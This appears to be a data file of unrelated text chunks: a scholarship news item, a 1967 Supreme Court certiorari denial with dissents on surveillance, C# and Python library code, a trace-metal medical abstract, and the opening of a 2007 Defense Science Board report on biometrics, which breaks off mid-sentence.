"That gesture was an emotional surprise for her.", "\n\n“Overwhelmed in a good way by the love and support of his classmates and his friends,” Jones said.", "\n\nShe wants the first scholarship recipient to a be a Henry Sibley student, ideally in the 2020 class just like her son. ", "After that, she would like there to be multiple recipients across the Twin Cities.", "\n\nAt the end of the game, it was announced $1,000 was raised for the scholarship fund." ]
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[ "386 U.S. 1019\n87 S.Ct. ", "1367\n18 L.Ed.2d 458\nSalvatore GRANELLO et al., ", "petitioners,v.UNITED STATES\nNo. ", "750.", "\nSupreme Court of the United States\nApril 24, 1967\nRehearing Denied June 5, 1967.", "\n\nSee 387 U.S. 949, 87 S.Ct. ", "2072.", "\nIrving Anolik, Irwin Klein and Irwin Germaise, for petitioners.", "\nSolicitor General Marshall, Assistant Attorney General Rogovin, Joseph M. Howard and John P. Burke, for the United States.", "\nPetition for writ of certiorari to the United States Court of Appeals for the Second Circuit.", "\n\n\n1\nDenied.", "\n\nMr. Justice DOUGLAS dissents:\n\n2\nThere are two issues in this case, relating to entirely separate events. ", "The first concerns the seizure of a lawyer's documents in Pennsylvania by the police from the premises where the lawyer stored them. ", "If we assume that the premises were unlawfully raided by the police, a client's paper seized and used against the client in a criminal prosecution, does the client have standing to move to suppress the evidence? ", "Whether petitioners were clients and Birrell their attorney are questions not fully resolved. ", "But I think they are entitled to a hearing on the issue and on the legality of the search. ", "I cannot, as of now, believe that if a lawyer-client relation is shown and if the search were held to be illegal, the client is without standing to move for suppression of the evidence. ", "The dimensions of the problem are so great in the setting of the Fourth Amendment and our enveloping regime of police surveillance, that we should put the case down for argument. ", "Another issue, mentioned by my Brother FORTAS, relates to electronic surveillance conducted in Florida. ", "On that, we should at least remand the case for findings on electronic surveillance as suggested by my Brother FORTAS in whose opinion I concur—without prejudice of course to the search and seizure question.", "\n\n\n3\nMr. Justice BRENNAN took no part in the consideration or decision of this petition.", "\n\n\n4\nMr. Justice FORTAS dissents with whom THE CHIEF JUSTICE joins:\n\n\n5\nIt is my opinion that certiorari should be granted and the case remanded for a hearing in the District Court with respect to the electronic surveillance which the Solicitor General has revealed to us. ", "According to the Solicitor General, agents of the Federal Bureau of Investigation on or about May 11, 1962, surreptitiously and by trespass installed an electronic listening device in a 'commercial establishment in Florida owned by an acquaintance of Levine and in which Levine may have had a proprietary interest.' ", "The device was in operation for nearly one year. ", "During that time a number of conversations in which Levine participated were overhead. ", "Some of those conversations were between Levine and attorneys representing him in prosecutions for interstate transport of counterfeit securities and for stock and mail fraud, matters then pending in a federal court in Florida.", "\n\n\n6\nThe Solicitor General represents that this violation of petitioner Levine's constitutional rights had no connection with the present case, which involves a prosecution in New York for failure to file income tax returns for 1956 and 1957. ", "He says that it originated in connection with an FBI investigation relating to the charges for which petitioner Levine was tried and convicted in Florida. ", "See Rogers v. United States, 334 F.2d 83 (C.A.5th Cir.), ", "cert. ", "denied Levine v. United States, 380 U.S. 915, 85 S.Ct. ", "892, 13 L.Ed.2d 800; Gradsky v. United States, 342 F.2d 147 (C.A.5th Cir.), ", "vacated and remanded sub. ", "nom. ", "Levine v. United States, 383 U.S. 265, 86 S.Ct. ", "925, 15 L.Ed.2d 737. ", "The Government represents that nothing was overheard which had anything to do with the present criminal tax case, and that neither the Internal Revenue Service nor prosecuting counsel was apprised of the existence of the surveillance. ", "The Solicitor General says that petitioner Levine will be furnished with the logs so that he may take whatever action is appropriate in the District Court in Florida relating to the convictions obtained in that court.", "\n\n\n7\nIt is entirely possible, perhaps even probable, that the Solicitor General's representations will be validated, and it may be that no reason will be developed for invalidating the present convictions because of the trespassory espionage or its fruits. ", "But this is 'dirty business.' ", "Olmstead v. United States, 277 U.S. 438, 470, 48 S.Ct. ", "564, 72 L.Ed. ", "944 (1928) (dissenting opinion of Mr. Justice Holmes). ", "It is important enough for the Solicitor General to call to our attention. ", "And an appraisal of the material and the circumstances by defense counsel may adduce facts affecting the weight to be given the unlawful operation which would never occur to the prosecutor. ", "The prosecutorial eye is, after all, apt to yield an out-of-focus picture, as is the eye of the defense. ", "But in our system we insist upon the perspective developed by both. ", "See Dennis v. United States, 384 U.S. 855, 875, 86 S.Ct. ", "1840, 16 L.Ed.2d 973 (1966). ", "In any event, the facts, circumstances, yield, and fruits of the electronic surveillance should be exposed in the record of this case so that we may, at least, be sure that the Government's trespassory surveillance has not infected the trial of these petitioners. ", "Cf. ", "O'Brien v. United States, 386 U.S. 345, 87 S.Ct. ", "1158, 18 L.Ed.2d 94; Schipani v. United States, 385 U.S. 372, 87 S.Ct. ", "533, 17 L.Ed.2d 428 (1966); Black v. United States, 385 U.S. 26, 87 S.Ct. ", "190, 17 L.Ed.2d 26 (1966).", "\n\n" ]
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[ "// Copyright (c) 2009 DotNetAnywhere\n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included in\n// all copies or substantial portions of the Software.", "\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. ", "IN NO EVENT SHALL THE\n// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n// THE SOFTWARE.", "\n\nusing System;\nusing System.", "Collections.", "Generic;\nusing System.", "Text;\n\nnamespace System.", "Net.", "Sockets {\n\t[Flags]\n\tpublic enum SocketFlags {\n\t\tNone = 0x00000000,\n\t\tOutOfBand = 0x00000001,\n\t\tPeek = 0x00000002,\n\t\tDontRoute = 0x00000004,\n\t\tMaxIOVectorLength = 0x00000010,\n\t\tTruncated = 0x00000100,\n\t\tControlDataTruncated = 0x00000200,\n\t\tBroadcast = 0x00000400,\n\t\tMulticast = 0x00000800,\n\t\tPartial = 0x00008000,\n\t}\n}\n" ]
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[ "Metal ions and infectious diseases. ", "An overview from the clinic.", "\nTrace elements (TEs) are required by both humans and bacterial pathogens. ", "Although metal ion homeostasis is tightly controlled in humans, growing evidence suggests that pathogens utilize a variety of means designed to circumvent the sequestration of TEs. ", "Colonizing pathogenic microorganisms employ a variety of strategies to sense, acquire, store, and export metal ions in the vertebrate host which include the biosynthesis and utilization of siderophores, and the expression of high-affinity metal-ion transporters. ", "For iron, selenium, and zinc, significant correlations have been shown between TE levels in plasma, serum, or tissues, and the prevention or treatment of a variety of infectious diseases; fewer such data exist for copper, chromium, or manganese. ", "TEs are often employed as antioxidants, and as supplements in patients with TE-deficient states. ", "The role of TE supplementation in humans as antioxidants remains controversial, but has demonstrated significant benefit in the role of selenium for patients with sepsis, and of zinc for the prevention of several infectious diseases." ]
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[ "\"In God we do trust,\" Herbert added, before throwing in a reference from the Bible and the LDS Church's signature scripture, the Book of Mormon. \"", "That is where we should put our trust, not in the arm of flesh. ", "I think that will help us guide this state and guide this nation in the pathway we should follow.\"" ]
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[ "from __future__ import absolute_import\n# Copyright (c) 2010-2014 openpyxl\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.", "\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. ", "IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.", "\n#\n# @license: http://www.opensource.org/licenses/mit-license.php\n# @author: see AUTHORS file\n\nimport re\n\nfrom .hashable import HashableObject\n\n\nclass NumberFormat(HashableObject):\n \"\"\"Numer formatting for use in styles.\"\"\"", "\n FORMAT_GENERAL = 'General'\n FORMAT_TEXT = '@'\n FORMAT_NUMBER = '0'\n FORMAT_NUMBER_00 = '0.00'\n FORMAT_NUMBER_COMMA_SEPARATED1 = '#,##0.00'\n FORMAT_NUMBER_COMMA_SEPARATED2 = '#,##0.00_-'\n FORMAT_PERCENTAGE = '0%'\n FORMAT_PERCENTAGE_00 = '0.00%'\n FORMAT_DATE_YYYYMMDD2 = 'yyyy-mm-dd'\n FORMAT_DATE_YYYYMMDD = 'yy-mm-dd'\n FORMAT_DATE_DDMMYYYY = 'dd/mm/yy'\n FORMAT_DATE_DMYSLASH = 'd/m/y'\n FORMAT_DATE_DMYMINUS = 'd-m-y'\n FORMAT_DATE_DMMINUS = 'd-m'\n FORMAT_DATE_MYMINUS = 'm-y'\n FORMAT_DATE_XLSX14 = 'mm-dd-yy'\n FORMAT_DATE_XLSX15 = 'd-mmm-yy'\n FORMAT_DATE_XLSX16 = 'd-mmm'\n FORMAT_DATE_XLSX17 = 'mmm-yy'\n FORMAT_DATE_XLSX22 = 'm/d/yy h:mm'\n FORMAT_DATE_DATETIME = 'd/m/y h:mm'\n FORMAT_DATE_TIME1 = 'h:mm AM/PM'\n FORMAT_DATE_TIME2 = 'h:mm:ss AM/PM'\n FORMAT_DATE_TIME3 = 'h:mm'\n FORMAT_DATE_TIME4 = 'h:mm:ss'\n FORMAT_DATE_TIME5 = 'mm:ss'\n FORMAT_DATE_TIME6 = 'h:mm:ss'\n FORMAT_DATE_TIME7 = 'i:s.S'\n FORMAT_DATE_TIME8 = 'h:mm:ss@'\n FORMAT_DATE_TIMEDELTA = '[hh]:mm:ss'\n FORMAT_DATE_YYYYMMDDSLASH = 'yy/mm/dd@'\n FORMAT_CURRENCY_USD_SIMPLE = '\"$\"#,##0.00_-'\n FORMAT_CURRENCY_USD = '$#,##0_-'\n FORMAT_CURRENCY_EUR_SIMPLE = '[$EUR ]#,##0.00_-'\n _BUILTIN_FORMATS = {\n 0: 'General',\n 1: '0',\n 2: '0.00',\n 3: '#,##0',\n 4: '#,##0.00',\n 5: '\"$\"#,##0_);(\"$\"#,##0)',\n 6: '\"$\"#,##0_);[Red](\"$\"#,##0)',\n 7: '\"$\"#,##0.00_);(\"$\"#,##0.00)',\n 8: '\"$\"#,##0.00_);[Red](\"$\"#,##0.00)',\n 9: '0%',\n 10: '0.00%',\n 11: '0.00E+00',\n 12: '# ?/?',", "\n 13: '# ??/??',", "\n 14: 'mm-dd-yy',\n 15: 'd-mmm-yy',\n 16: 'd-mmm',\n 17: 'mmm-yy',\n 18: 'h:mm AM/PM',\n 19: 'h:mm:ss AM/PM',\n 20: 'h:mm',\n 21: 'h:mm:ss',\n 22: 'm/d/yy h:mm',\n\n 37: '#,##0_);(#,##0)',\n 38: '#,##0_);[Red](#,##0)',\n 39: '#,##0.00_);(#,##0.00)',\n 40: '#,##0.00_);[Red](#,##0.00)',\n\n 41: '_(* #,##0_);_(* \\(#,##0\\);_(* \"-\"_);_(@_)',\n 42: '_(\"$\"* #,##0_);_(\"$\"* \\(#,##0\\);_(\"$\"* \"-\"_);_(@_)',\n 43: '_(* #,##0.00_);_(* \\(#,##0.00\\);_(* \"-\"??_);_(@_)',\n\n 44: '_(\"$\"* #,##0.00_)_(\"$\"* \\(#,##0.00\\)_(\"$\"* \"-\"??_)_(@_)',\n 45: 'mm:ss',\n 46: '[h]:mm:ss',\n 47: 'mmss.0',\n 48: '##0.0E+0',\n 49: '@', }\n _BUILTIN_FORMATS_REVERSE = dict(\n [(value, key) for key, value in _BUILTIN_FORMATS.items()])\n\n __fields__ = ('_format_code',\n '_format_index')\n __slots__ = __fields__\n __leaf__ = True\n\n DATE_INDICATORS = 'dmyhs'\n BAD_DATE_RE = re.compile(r'(\\[|\").*[dmhys].*(\\]|\")')\n\n def __eq__(self, other):\n if isinstance(other, NumberFormat):\n return self.format_code == other.format_code\n return self.format_code == other\n\n def __hash__(self):\n return super(NumberFormat, self).__hash__()\n\n def __init__(self):\n self._format_code = self.", "FORMAT_GENERAL\n self._format_index = 0\n\n @property\n def format_code(self):\n \"\"\"Getter for the format_code property.\"\"\"", "\n return self._format_code\n\n @format_code.setter\n def format_code(self, format_code = FORMAT_GENERAL):\n \"\"\"Setter for the format_code property.\"\"\"", "\n self._format_code = format_code\n self._format_index = self.builtin_format_id(format_code)\n\n def builtin_format_code(self, index):\n \"\"\"Return one of the standard format codes by index.\"\"\"", "\n return self._BUILTIN_FORMATS[index]\n\n def is_builtin(self):\n \"\"\"Check if a format code is a standard format code.\"\"\"", "\n return is_builtin(self.format_code)\n\n def builtin_format_id(self, fmt):\n \"\"\"Return the id of a standard style.\"\"\"", "\n return self._BUILTIN_FORMATS_REVERSE.get(fmt, None)\n\n def is_date_format(self):\n \"\"\"Check if the number format is actually representing a date.\"\"\"", "\n return is_date_format(self.format_code)\n\n\ndef is_date_format(fmt):\n if fmt is None:\n return False\n if any([x in fmt for x in NumberFormat.", "DATE_INDICATORS]):\n return not NumberFormat.", "BAD_DATE_RE.search(fmt)\n return False\n\n\ndef is_builtin(fmt):\n return fmt in NumberFormat._BUILTIN_FORMATS.values()\n" ]
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[ "Commentaires 0\n\nRetranscription du document\n\nReport of theDefense Science Board Task ForceonDefense Biometrics\n\nMarch 2007\n\nOffice of the Under Secretary of DefenseFor Acquisition, Technology, and LogisticsWashington, D.C. 20301-3140\n\nThis report is a product of the Defense Science Board (DSB). ", "The DSB is a Federal AdvisoryCommittee established to provide independent advice to the Secretary of Defense. ", "Statements,opinions, conclusions, and recommendations in this report do not necessarily represent theofficial position of the Department of Defense.", "\n\nThe DSB Task Force on Defense Biometrics completed its information gathering in September2006. ", "This report is UNCLASSIFIED and releasable to the public.", "\n\nExecutive SummaryA Defense Science Board Task Force was organized to address a number of issues relating to theuse of Biometrics in the Department of Defense. ", "The Terms of Reference (Appendix A) askedthat specific organizational issues be addressed promptly and the Task Force provided an interimbriefing that focused on these issues.", "While the terms of reference refer to “biometrics,” the Task Force is convinced that “identitymanagement” is the more inclusive and the more useful construct. ", "The Task Force holds twocompanion theses. First, while we can come up with an endless set of scenarios in whichbiometrics might be called upon to play a role, with analysis and a little abstraction withoutlosing the essence, the endless array of scenarios can be reduced to a compact set of “use cases”.", "This compact set of use cases will help us appreciate our companion thesis, that a common “backoffice” process (and associated “data model”) can be envisioned to service all the biometric, andthus Identity Management, use cases.", "That said, we clearly did not have either the time or the resources to study Identity Management(IM) conclusively, especially in terms of the broadened set of organizational associations, usecases and Defense applications, and even social issues, attendant to that sprawling field. ", "The“common back-office process,” and related architecture, to support biometrics, as alluded to justabove, is itself a rich field of study that deserves and demands close attention and broadertreatment than we were able to provide here. ", "Another important aspect of the total subject ofIdentity Management is the whole universe of tokens and credentials. ", "There are many of these,in as many different formats and standards as there are applications. ", "Only some of them support,or are used in conjunction with, biometrics. ", "We speak to some extent of the credential standardmandated for use across the federal government, called FIPS-201. ", "Beyond that, however, thislarge and important topic will have to await a broader treatment of the whole of IdentityManagement, and we do recommend that such an effort be undertaken with a fully scopedcharter.", "What we have sought to do is to examine biometrics carefully, and we have placed those issues,both technological and “organizational,” into the operational context of their use in strengtheningIM processes. ", "There remains, however, much to be done to understand and implement neededchanges in organization, technology, and process before IM can achieve its full potential in theDoD or elsewhere. ", "It is noteworthy that while significant progress is being made, both inside theDoD and across the federal government, to define and implement organizational approaches tobiometrics, these efforts have yet to explicitly embrace the larger scope of IM, systemically. ", "TheTask Force holds that the enhancements to biometrics management we cite here are in the criticalpath to that outcome. ", "However, it should be understood that such improvements in biometricsonly, while necessary, are insufficient to the total need.", "The Task Force finds that biometrics suffers from a characteristic of many “new” areas oftechnology and application. ", "At the outset, biometrics had (it seems) as many advocates makingunsupportable performance claims as it had detractors decrying its mystery, uncertainty andunacceptability on the basis of historic formulations of governance, privacy, etc. ", "It is also trueDEFENSEBIOMETRICS____________________________________________________________________1CHAPTER1:\n\nEXECUTIVESUMMARY_____________________________________________________\n\nthat in biometrics the truth lies between these extreme positions, and for the most part, hasyielded to thoughtful technical analysis and collaborative, inclusive, organizational effort. ", "TheTask Force will make several recommendations designed to advance these two parallel butassociated lines of effort, the technological and the organizational.", "Identity management, the output of the application of biometrics, and the real issue here, isvitally important to the success of many missions of the Department, and increasingly so. ", "Thisgrowing importance, however, has not been reflected in the attention the Department has paid tothe topic. ", "At the outset of our study, the Department was neither well organized nor properlymotivated for success in identity management, or biometrics. ", "Since then, the Department hassignificantly improved its focus on management of the biometrics mission. ", "Activities andresponsibilities in the larger scope of Identity Management, however, remain broadly distributedacross a number of Defense organizations, and we believe that the Department must embrace thelarger construct. ", "Several factors presage the increasing importance of identity management. Logical Access Control:The inexorable increase in information-based processes andincreasingly critical dependence on the confidentiality, integrity and availability ofinformation demand stringent controls on logical access which, in turn, stressauthentication techniques. Physical Access Control:Increasing terrorist threats to our personnel, facilities andcapabilities demands similarly stringent controls on physical access which too stressesauthentication techniques. ", "Likewise, criminal threats to our resources. Targeting:Our military and intelligence concerns in the Global War on Terrorism havelargely shifted away from nation states and their facilities, and toward individuals.", "The Task Force found need for clarifying and strengthening, perhaps reassigning, authorities andresponsibilities for the full cast of DoD roles: Principal Staff Assistant (PSA):An empowered, dedicated Assistant Secretary-levelindividual who can provide and/or coordinate effectively the policy, strategic direction,oversight and evaluation; ensure sound programmatics and adequate resources within theDepartment; serve as “functional advocate” for biometrics (and eventually, identitymanagement); and represent the Department in relevant interagency, intergovernmentaland international processes. Joint Staff Advocate:A similarly empowered individual of status who would bedesignated as the primary focal point for staffing and coordination of biometrics issues onthe Joint Staff. Combatant Commander:A designated commander responsible for developing and/orcoordinating the requisite Concepts of Operations (CONOPS), joint experimentation andtraining, and joint and inter-agency doctrine for the military applications of biometrics.2____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n_____________________________________________________CHAPTER1:\n\nEXECUTIVESUMMARY\n\n Executive Agent:A service, agency or field activity that can support the PSA inimplementing, under PSA authority, Defense-wide programs for acquiring, fielding,sustaining and training, and in some cases operating, the biometric and related systems.", "The Task Force stopped short of making recommendations about the assignment of theseroles and responsibilities to specific Departmental entities with the exception of the role ofJoint Forces Command in areas related to experimentation, doctrine and training, tactics andprocedures (TTP). ", "It did previously provide a list of obvious candidates with its assessmentof their respective strengths and weaknesses. ", "The Task Force also provided a number ofinterim findings and made several interim “process” recommendations.", "Among the interim findings which have been substantiated and/or reinforced by subsequentstudy, the Task Force finds: The importance of identity management and the role of biometrics in the Department ofDefense are underappreciated. ", "Identity management and biometrics represent a keyenabler in the Global War on Terrorism, can save lives, are essential to InformationAssurance (which is key to Mission Assurance), and has international implications whereour leadership is in question. The present management structure largely reflects pre-9/11 requirements: a “blue” focusinside DoD, and conceived in the context of information assurance. ", "However,requirements and applications have grown with the emergence of “red” and “gray”requirements, HSPD/NSPD-driven requirements, increased inter-agency and internationalinterests, and the growing importance of forensics on the battlefield. Urgent battlefield needs are not being met. ", "The current “program” appears to lack thenecessary warfighter customer orientation. ", "The current execution appears to beinefficient and opportunities are being missed. Requirements will continue to grow as current business processes scale up, as newapplications come on line, as the adversaries adapt and as new threats emerge. Technology is changing for the better. ", "New technologies must be inserted rapidly. ", "Insome cases, technology will need to be stimulated to meet the most demanding militaryapplications. There appears to be considerable benefit in a Department-wide authority for identitymanagement and biometrics, accountable and responsible for its funding, policy, visionand direction, and sustainment.", "Irrespective of the specific organizational “who,” the Task Force found that certain actions wereimperative and urged that, without further delay, the Department: Decide who is/will be the ID-Mgmt/Biometrics Principal Staff Assistant (PSA) andupdate the documentation to reflect that reality.", "DEFENSEBIOMETRICS____________________________________________________________________3CHAPTER1:\n\nEXECUTIVESUMMARY_____________________________________________________\n\n Designate the PSA for biometrics as a “functional advocate” for biometrics issues withinand across the Global Information Grid (GIG). Formalize and strengthen relationships between the Biometrics Fusion Center (BFC), theDefense Manpower Data Center (DMDC), and all other Defense entities with explicitand/or implicit biometric/identity management roles and/or missions. Decide promptly on a comprehensive (data) architecture for backup and disasterrecovery. Identify and establish central OSD oversight of all Defense-wide Biometrics activitiesimmediately, to include the Armed Forces Joint Identification Laboratory in Rockville,MD, and its DNA repository1. Identify and establish management oversight of all biometrics programmatic activitieswithin a consolidated program of record. ", "Capture (interim) requirements in time tointersect the FY07 PDM; create a Defense-wide Biometric funding program andimmediately put a “wedge” in the FY08 POM. ", "Subsequently, consider a Defense-widefunding program for the larger Identity Management activities, including RDT&E,Procurement, O&M, personnel, and training. Create a permanent manning document for the Biometric Fusion Center (BFC) at/abovecurrent staffing levels; establish joint billets as appropriate, and designate the BFC as“critical infrastructure.", "” Establish all required identity management CONOPS, doctrine, experimentation, trainingand education programs and processes.", "We were gratified when, on 4 October 2006, the Deputy Secretary of Defense designated theDirector, Defense Research & Engineering (DDR&E) as the Principal Staff Assistant (PSA) forbiometrics2, with responsibility for the authority, direction, and control of DoD biometricsprograms, initiatives, and technologies. ", "The Army was named in the same document asExecutive Agent, with defined responsibilities under the direction of the PSA. ", "Most of thespecific recommendations contained in the report, then, are aimed at the PSA. ", "These aredistributed throughout the report and recapitulated in the last chapter, categorized according towhether they reflect: internal DoD issues; issues external to DoD; remaining organizationalissues; R&D, materiel and technology issues; information management issues; and/or, legal andprivacy issues.", "\n\n1We call DNA out here specifically as there is, at present, definitional debate within the US government regardingthe proper “status” of DNA as a “true biometric”. ", "Based on the range of DoD use cases involving DNA, the TaskForce has chosen to define DNA as a “biometric modality,” even while recognizing its unique character.2See Appendix C of this report4____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n_____________________________________________________CHAPTER1:\n\nEXECUTIVESUMMARY\n\nFinally, although the art form of reports such as this often presages key recommendation in theExecutive Summary, we do not. ", "There are simply too many. ", "Instead, we have chosen torecapitulate all the recommendations and their associated conclusions in Chapter 18. ", "These arecharacterized according to the category of the recommendation: Information management andsharing; R&D and technology; Issues external to the Department of Defense; Internal issues;Organizational issues; and Legal and privacy issues. ", "Where the recommendations fall into morethan one category, they are duplicated for convenience and within each category therecommendations are treated in the order of their appearance in the body of the report.", "DEFENSEBIOMETRICS____________________________________________________________________5CHAPTER1:\n\nEXECUTIVESUMMARY_____________________________________________________\n\n6____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\nIntroduction—Identity Management and BiometricsFrom its inception, this Defense Science Board Task Force on Biometrics understood that its jobwas to examine a topic which was urgent, complex, somewhat new and distinctly open-ended.", "“Biometrics” was and is seen as an emerging field of growing importance to the Department ofDefense and the nation’s security more broadly. ", "The first and most important finding of theTask Force was that in order to understand the science and applications of biometrics, these mustfirst be placed in context. ", "The Task Force brought a variety of views to bear but there wasunanimity that the “real” topic of discussion was “identity management” rather than simply“biometrics.” ", "Biometric identification supports identity management, which is a key to successin many mission areas in the Department of Defense and in the larger national and homelandsecurity context both in the US and internationally.", "Identity management is increasingly critical to the success of many missions of the Departmentof Defense, but this growing importance is not reflected in the attention the Department has paidto the topic in the past. ", "The Department of Defense has been neither well organized nor properlymotivated for success in identity management.", "The recent appointment of the Director of Defense Research and Engineering (DDR&E) to act asthe OSD Principal Staff Assistant (PSA) for biometrics3is a very positive step in this complexprocess. ", "There is much work to be done in biometrics, and the DDR&E, working withorganizations inside and outside the Defense Department, will be busy with it for some time.", "That said, the Task Force has sought to make the case that biometrics are inseparable from thelarger field of Identity Management (IM), in almost any application or level of treatment otherthan pure science and research. ", "Beyond that, Identity Management is itself linked intrinsically toInformation Assurance (IA), in ways which have been described in some detail in recent DSBreports.", "Pragmatically, we must conclude that it would be difficult to define, here and now, the properorganizational/technology approach to a universally biometrically-enabled, strongly-identifiedand assured, global information grid. ", "However, that must be the procedural path along which weare looking and thinking, even now. ", "Consequently, we must begin to structure our attention, andincrease our understanding, within that expanded scope of interest.", "As discussed throughout, the Task Force was clear that no examination of biometrics could failto consider Identity Management (IM). ", "However, it was just as clear to us that we did not havethe time or resources to study the full scope of IM comprehensively, and that remains anunfulfilled need to be accomplished in the proper time and way.", "In any very small group there is no need for identity management. ", "However, wheneverpopulations become more numerous, especially if they are not always or ever in physical contact\n\n3Deputy Secretary of Defense memo dated 4 October 2006 -- See Appendix C. The same document defined therole of the Army as Executive AgentDEFENSEBIOMETRICS____________________________________________________________________7\n\nCHAPTER2:\n\nINTRODUCTION__________________________________________________________with each other, distinguishing among individuals becomes steadily more important. ", "In nationalsecurity matters, as friend/foe distinctions such as clothing (uniforms) diminish in incidence andusefulness, this point is underlined. ", "Differentiation based on sight, sound and smell provided theearliest distinctions, and the data management was initially based on “full path names”—i.e., ", "the“begats”.", "Today, identity management is more important than ever. ", "Names carry less information todayand are less unique, but biometrics have improved markedly as have our data managementcapabilities. ", "Both are far from perfect, however, and set the agenda for our task force, as did theset of DoD missions that depend on identity management and therefore on biometrics.", "To reiterate, biometrics is but a means to an end, while identification is the goal. ", "Indeed, tryingto define “biometric” in the current context is next to impossible without invoking the idea ofidentity, identity management, and/or identity management system.", "An identity management system, here, is meant to include both algorithms, their instantiation insoftware/hardware, as well as data. ", "The data are an organized collection of information aboutspecific individuals. ", "Indeed, when we ask “who are you,” we are really asking “what are you” -e.g., ", "friend or felon?It is easiest to think of an identity database as a relational database, rows and columns, where therows (“entities” or “records”) are individuals, where the columns (or “attributes”) arecharacteristics or categories of information about individuals, and where the columnar entries (orfields) represent the particulars for that individual. ", "Certain of the attributes serve principally to“identify” you, that is, to allow one to query (or “index into”) the database and retrieve some orall of your record. ", "Among traditional “identifiers” are name and social security number (SSN).Names may be our first impulse, but they are notoriously ambiguous and generally notsufficiently unique. ", "SSN is more unique. ", "All of these variables, however, suffer from theproblem that they can be compromised relatively easily - bought, stolen, or invented. ", "Thus, theyare increasingly insufficient, by themselves, for identification. ", "That brings us to biometrics.", "The National Science and Technology Council (NSTC) subcommittee on biometrics definesbiometrics as:A measurable biological (anatomical and physiological) and/or behavioralcharacteristic that can be used for automated recognition.", "Their use of the qualifier “automated” reflects the practical utility of actual biometric systems,which otherwise would be generally inefficient and ineffective because of theuncontrolled/unknown error rates and biases that humans introduce. ", "Read “recognition,” per thepreceding discussion, as the ability to retrieve with high confidence the identity record of theindividual, i.e., to index into an identity database. ", "Their definition accords well with standarddictionary usage:The term biometric is the name given a technology that is the measurement of aliving, human characteristic. ", "This process includes the ability to measure8____________________________________________\n\nDEFENSESCIENCEBOARDTASKFORCE ON\n\n________________________________________________________CHAPTER\n\n2:\n\nINTRODUCTION\n\ncharacteristics such as fingerprints, voice recordings, irises, heat patterns,keystroke rhythms, and facial images; comparing a person's uniquecharacteristics against previously enrolled images for the purpose of recognition.", "The unique pattern of a physical feature such as a fingerprint, iris, or voice asrecorded in a database for future attempts to determine or recognize a person'sidentity when these features are detected by a reading device.", "Identity vs. “Collateral Data”It is useful to separate conceptually the “identity” and those “collateral data” which are pointedto by the identity, or which point to the identity. ", "In one case, the identity is used to reference orretrieve or “index into” collateral data. ", "In the second case, items of biographic data may simplybe an explicit “back-pointer” or it may be implicit, i.e., inferred from sufficiently unique items ofbiographic or privilege data.4\n\nFurthermore, it is useful to conceptually separate the “biographic” from the “privilege” data.", "Biographic information, including established “roles” for the individual, provides the basis forthe need and/or “suitability” decisions to confer a right or a privilege. ", "Privilege informationincludes a description of the privilege granted and, perhaps, pointers to the biographicinformation on which the decision was based. ", "Some form of “back chain” from the basis-information to the privilege would support dynamic reconsideration of the privilege by thegrantor when basis information changes, which would otherwise require (frequent) periodicpolling. ", "The relationship of “identity” to “privileges,” including the management processesrelated to both is an important one.", "Collateral information also includes physiological data, those items of information common toall individual humans. ", "We all were born at a time and in a place; we all have height, weight, hairand eye color, etc. ", "Many of these characteristics are commonly used to “recognize” anindividual, i.e., to confirm an identity. ", "Some, like fingerprints or DNA, are sufficiently uniqueand durable/unchanging to support strongly fixing an identity. ", "It is these that we refer to asbiometrics.", "It is also important to define “identity.” ", "Strictly speaking “identity” is the “unit of analysis” (orrecord or row) in an identity management system. ", "A particular identity is a particular recordwhich (in a well-ordered system) has a unique “accession number,” which one also might thinkof as “the identity.” ", "When associated with individual humans in a system, the concept of “rootidentity” emerges, as discussed below.", "\n\n4The bane of the privacy community is the ability to follow the logical threads using these pointers, which willdisclose a lot of “peripheral” information from one or a few pieces of information. ", "This is particularly troublesomewhen, in the eye of the individual, the peripheral information is not seen as germane to the legitimate purpose ofconferring a right or a privilege. ", "The more complete (and organized) the totality of the ensemble of information, themore inferential threads that can be pulled, and the more worrisome the process is to privacy advocates.", "DEFENSEBIOMETRICS____________________________________________________________________9\n\nCHAPTER2:\n\nINTRODUCTION__________________________________________________________Identity AssuranceDigital identities have become critical in both civilian and federal enterprises. ", "They represent ahigh assurance level that the identity of a person has been adjudicated by an enterprise or agencyaccording to policy and therefore maintain a certain status of reliability. ", "However, as with mostattempts to create interoperability’s between organizations, there is the reality that individualorganizations or agencies will not trust the credentials issued by other organizations or agencies.", "It is generally true at present that there is no surety that the 